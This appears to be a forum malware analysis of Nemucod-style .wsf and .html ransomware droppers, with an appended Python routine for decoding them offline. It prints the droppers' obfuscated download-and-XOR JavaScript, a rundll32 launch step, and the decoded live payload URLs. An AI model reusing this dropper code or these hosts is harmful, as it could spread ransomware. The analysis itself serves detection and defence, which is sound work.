- May 14, 2016
3 files From : https://malwaretips.com/threads/31-8-16-6.62930/
(Thanks to @Solarquest)
Sample 3 : csnLmN.wsf
Sample 4 : d13gTz.wsf
Sample 1 : qXKlF.html
5/55 Antivirus scan for 044510cf9b3c0ac7c60df3a8717ed9d0f150112168d97c1cdbe63839d49fbeed at 2016-08-31 13:12:22 UTC - VirusTotal
5/56 Antivirus scan for 8d1f122fcbe0da9a3b1081552398bdffd55670d4348fff31711ba81d61107788 at 2016-08-31 13:13:35 UTC - VirusTotal
=> Similar obfuscation methods to a previous sample I analyzed :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
Some changes, but the URLs used are easily retrieved by the same method I used before.
1) Samples 3 & 4 : same URLs & payload name(s) :
Looking at the end of the script :
var mahorkavodkatvarMASHEVHORDA17 = "sYCfiSIE";
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
var mahorkavodkatvarMASHEV_a5 =
[
"d3POUNId3LnlhY2h0LW1hcmtldC5lPOUNIdS9qaEJIVFls",
"dPOUNI3d3LnBvbGktbWVjLml0L2poQkhUWWPOUNIw=",
"d3POUNId3LmVxdWlwZTQuPOUNIbmV0L2poQkhUWWw="
];
var mahorkavodkatvarMASHEVHORDAI = 0;
for(mahorkavodkatvarMASHEVHORDA5 in mahorkavodkatvarMASHEV_a5){
mahorkavodkatvarMASHEVHORDAI++;
try{
var mahorkavodkatvarMASHEVHORDA6 = "http://"+mahorkavodkatvarMASHEV_a5[mahorkavodkatvarMASHEVHORDA5].mahorkavodkatvarDREAMTEAM() + "?mssGTlVi=KiqvaljO";
mahorkavodkatvarMASHEV_a2(mahorkavodkatvarMASHEVHORDA6,mahorkavodkatvarMASHEVHORDA17+mahorkavodkatvarMASHEVHORDAI);
}catch(mahorkavodkatvarMASHEVCEESZZAAA){}
}
Explanations :
Names for the files downloaded :
"sYCfiSIE" + index
=> sYCfiSIE1
=> sYCfiSIE2
=> sYCfiSIE3
URLs :
An array is easily found with these values :
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
These are Base64 strings, but with an extra part added to obfuscate them a bit more.
Looking at their function that does the decoding part :
.mahorkavodkatvarDREAMTEAM()
String.prototype.mahorkavodkatvarDREAMTEAM = function() {
mahorkavodkatvarMASHEVXCOP = 0;
var mahorkavodkatvarMASHEVddDccC1, mahorkavodkatvarMASHEVddDccC2, mahorkavodkatvarMASHEVc3, mahorkavodkatvarMASHEVc4;
var mahorkavodkatvarMASHEVout = "";
var mahorkavodkatvarMASHEVpechenka= this["replace"](/POUNI/g, '');
var mahorkavodkatvarMASHEVlen = mahorkavodkatvarMASHEVsud(mahorkavodkatvarMASHEVpechenka);
...
... (Base64 decode stuff)
...
}
this["replace"](/POUNI/g, ''); => every POUNI has to be removed from the text passed as parameter, to get the real Base64 strings
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
=> Real Base64 strings :
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=="
"aWZ0aWtoYXJjaGF1ZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="
With a Base64 decode tool :
=> URLs :
"http://" + "lanjaron.es.mialias.net/jhBHTYl" + "?UXRxPvxm=QKvTymv"
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl" + "?UXRxPvxm=QKvTymv"
"http://" + "mojejeze.republika.pl/jhBHTYl" + "?UXRxPvxm=QKvTymv"
Payload (3 names, but exactly the same ransomware) :
"http://" + "lanjaron.es.mialias.net/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE1 => sYCfiSIE1.dll
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE2 => sYCfiSIE2.dll
"http://" + "mojejeze.republika.pl/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE3 => sYCfiSIE3.dll
The .dll extension is added when the deobfuscation of the real file is a success.
2) NEMUCOD part :
With some functions that will be used to deobfuscate the downloaded file and turn it into a real .dll :
var mahorkavodkatvarMASHEVLUCIODOR = "CWZ1bmN0aW9uIG1haG9ya2F2b2RrYXR2YXJNQVNIRVZydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2YXIgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrc1s ..........................................
As usual, these functions are hidden in a var as a Base64-encoded string.
Result in the spoiler part :
function mahorkavodkatvarMASHEVrtfta(filePath)
{
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["LoadFromFile"](filePath);
var fileString=mahorkavodkatvarISHEVrosteks["ReadText"];
mahorkavodkatvarISHEVrosteks["close"]();
return mahorkavodkatvarMASHEVfsta(fileString);
};
function mahorkavodkatvarMASHEVfats(codeArray)
{
var t2=new Array();
t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;
t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)
{
HIi3=codeArray[Tj];
if (HIi3 < 128){OVc9=HIi3;
}else
{
OVc9=t2[HIi3];}
EGj.push(String["fromCharCode"](OVc9));
}
resultString=EGj["join"]("");
return resultString;
};
function mahorkavodkatvarMASHEVsatt(filePath, codeArray)
{
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["writeText"](mahorkavodkatvarMASHEVfats(codeArray));
mahorkavodkatvarISHEVrosteks["SaveToFile"](filePath, 2);
mahorkavodkatvarISHEVrosteks["close"]();
};
function mahorkavodkatvarMASHEVxdac(mahorkavodkatvarMASHEVcca)
{
for (var Tj=0; Tj < mahorkavodkatvarMASHEVcca["length"]; Tj++)
{
mahorkavodkatvarMASHEVcca[Tj] ^= mahorkavodkatvarTRAxKey[Math.floor(Tj % mahorkavodkatvarTRAxKey.length)];
}
return mahorkavodkatvarMASHEVcca;
};
The ciphered key used to do the XOR part :
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
It returns the real string whose chars will each be used for the famous XOR part : ^=
(once every char of this string has been used => it jumps back to the first char and continues)
function xdac(content_file)
{
for (var index = 0; index < content_file.length; index++)
{
content_file[index] ^= xKey[Math.floor(index % xKey.length)];
}
return content_file;
};
See previous analysis :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
3) Run :
rundll32 is used, with the file path and a parameter for the dll : qwerty
4) Difference with other Nemucod samples :
To deobfuscate the payload, some functions we saw in the last Nemucod version (from other downloader scripts) are not present (like in the same analysis of similar wsf droppers)
=> only the XOR part is used here, so it is easier in these scripts
On the latest version I have seen from other scripted downloaders, the XOR part uses :
uheprng(){
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng(){
...
...
}
...
etc,...
5) Sample 1 is similar : qXKlF.html
The only difference :
this.replace(/LUABUA/g, '');
eval(alkotesterzercerLOBIKLUCIODOR); => eval of the hidden part
var alkotesterzercerLOBIKHORDA17 = "EhFjFSNri"; => file name while still obfuscated
var alkotesterzercerTRAxKey = alkotesterzercerLOBIKfsta("OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j");
Result : the deciphered key used for the XOR part
var alkotesterzercerLOBIK_a5 =
[
"d3d3Lml0b2dhemFpZLUABUAGFuLmpwL0hKZ2hqdDg3Mg==",
"Y29udmVuaWxpZLUABUAmVjYW5iZS53ZWIuZmMyLmNvbS9ISmdoanQ4NzI=",
"ZnJlZXVzZWQud2ViLmZjMi5jb20vSEpnaGp0ODcy"
];
Base64 decode :
URLs :
"http://" + "www.itogazaidan.jp/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "convenilifecanbe.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "freeused.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
PAYLOAD :
EhFjFSNri1 => EhFjFSNri1.dll
EhFjFSNri2 => EhFjFSNri2.dll
EhFjFSNri3 => EhFjFSNri3.dll
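Added example, not part of the original post or of the dropper itself : the steps described above (strip the junk token, Base64-decode the hosts, build the URL list with the incrementing file name, then XOR the download with the cycling key through a CP437 text stream) re-implemented in Python, so the URLs and the payload can be recovered offline without ever running the .wsf. The host arrays, junk tokens, query strings and key literals are the ones quoted in the post for samples 3/4 and sample 1. Two things the post does not show are assumed here and marked in the code : fsta() is taken to return the code points of its argument (so the XOR key is just the bytes of the key literal), and the "success" check that earns the .dll extension is taken to be the MZ magic. The t2 table of fats() is the upper half of IBM code page 437, which is what Python's cp437 codec implements, so no table needs to be copied. The "downloaded" blob at the bottom is constructed for the demo.

```python
"""Offline decoder for the Nemucod-style .wsf droppers analysed above (added example)."""
import base64

# Data quoted in the post: obfuscated host arrays, junk tokens, query strings, keys, file names.
SAMPLE_3_4 = {
    "junk": "POUNI",
    "query": "?UXRxPvxm=QKvTymv",
    "hosts": [
        "bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
        "aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
        "POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw=",
    ],
    "key": "i4qGajo8QJA8VtuKNag3OyYhcnIEKcql",
    "name": "sYCfiSIE",
}
SAMPLE_1 = {
    "junk": "LUABUA",
    "query": "?MnKqQCLOB=aTDtnTWp",
    "hosts": [
        "d3d3Lml0b2dhemFpZLUABUAGFuLmpwL0hKZ2hqdDg3Mg==",
        "Y29udmVuaWxpZLUABUAmVjYW5iZS53ZWIuZmMyLmNvbS9ISmdoanQ4NzI=",
        "ZnJlZXVzZWQud2ViLmZjMi5jb20vSEpnaGp0ODcy",
    ],
    "key": "OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j",
    "name": "EhFjFSNri",
}


def decode_host(encoded: str, junk: str) -> str:
    """String.prototype.DREAMTEAM(): this.replace(/JUNK/g, '') then Base64 decode.
    validate=True makes b64decode reject any character outside the Base64 alphabet,
    so a junk token that was not fully stripped fails loudly instead of decoding garbage."""
    return base64.b64decode(encoded.replace(junk, ""), validate=True).decode("ascii")


def build_download_list(sample: dict) -> list:
    """The loop at the end of the script: one (URL, local file name) pair per array entry.
    The counter starts at 0 and is incremented before use, hence names ending in 1, 2, 3."""
    out = []
    for index, encoded in enumerate(sample["hosts"], start=1):
        url = "http://" + decode_host(encoded, sample["junk"]) + sample["query"]
        out.append((url, sample["name"] + str(index)))
    return out


def fsta(text: str) -> list:
    """ASSUMPTION (fsta is not shown in the post): the inverse of fats(), CP437 char -> byte."""
    return list(text.encode("cp437"))


def fats(codes: list) -> str:
    """fats(): byte -> char; values < 0x80 map to themselves, 0x80-0xFF through the t2 table,
    which is exactly the upper half of IBM code page 437 (Python's cp437 codec)."""
    return bytes(codes).decode("cp437")


def xdac(codes: list, key: list) -> list:
    """xdac(): codes[i] ^= key[i % len(key)]; the key restarts at its first char once used up."""
    return [c ^ key[i % len(key)] for i, c in enumerate(codes)]


def deobfuscate_download(raw: bytes, key_string: str) -> bytes:
    """rtfta -> xdac -> satt: read the download as CP437 text (Charset=437), turn it into a code
    array, XOR it, and write it back through a CP437 text stream. Because CP437 round-trips
    every byte value, the net effect on disk is a plain byte-wise XOR with the cycled key."""
    file_string = raw.decode("cp437")                   # ADODB.Stream LoadFromFile + ReadText
    codes = xdac(fsta(file_string), fsta(key_string))   # key = fsta("i4qG...") as in the script
    return fats(codes).encode("cp437")                  # ADODB.Stream writeText + SaveToFile


def is_pe(data: bytes) -> bool:
    """ASSUMPTION (the post does not show the success test): a real DLL starts with 'MZ'."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    for url, name in build_download_list(SAMPLE_3_4) + build_download_list(SAMPLE_1):
        print(f"{url}  ->  {name}")
    # Constructed stand-in for a downloaded blob: a fake "DLL" XORed with the sample 3/4 key.
    fake_dll = b"MZ\x90\x00" + bytes(range(256)) + b"constructed stand-in, not a real payload"
    blob = deobfuscate_download(fake_dll, SAMPLE_3_4["key"])   # XOR is its own inverse
    recovered = deobfuscate_download(blob, SAMPLE_3_4["key"])
    print("recovered PE:", is_pe(recovered), "identical:", recovered == fake_dll)
```

Two practical notes. The junk removal is a global replace, exactly like the /POUNI/g regex, so it only works because the dropper's author chose a token that never occurs inside a legitimate Base64 string; the validate=True decode is the cheap check that nothing was left behind. And since the CP437 read/write pair is lossless, an analyst who already has the downloaded blob can skip the ADODB emulation entirely and just XOR it with the key bytes; if fsta() turns out to do more than return char codes in a given sample, only the key bytes change, not the routine.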